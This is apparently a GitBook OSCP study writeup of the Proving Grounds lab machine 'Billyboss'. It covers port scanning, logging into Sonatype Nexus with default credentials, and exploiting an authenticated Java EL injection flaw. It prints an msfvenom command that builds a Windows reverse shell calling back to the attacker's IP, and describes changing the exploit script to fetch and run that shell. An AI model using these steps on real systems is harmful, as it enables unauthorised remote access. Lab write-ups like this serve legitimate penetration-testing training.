📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • HTTP (port 8081)
  • Exploit

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Windows

Billyboss

Writeup for Billyboss from offsec Proving Grounds

PreviousSlortNextFish

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.170.61 all

Service Enumeration

HTTP (port 8081)

We see that this is running Sonatype Nexus Repository Manager 3.21.0.5.

We can try various different default credentials and find that only nexus:nexus works.

Exploit

There is an exploit for Nexus Repository Manager 3 versions 3.21.1 and below which is vulnerable to Java EL injection which allows a low privilege user to gain RCE on the target.

First, we generate our payload using MSF venom.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081

We then modify the script to download our payload and execute it.

Next, we execute the script and verify that the payload has been downloaded to our target machine.

Next, we change the CMD command to 'cmd.exe /c shell.exe' and we run the script again.

LogoSonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)Exploit Database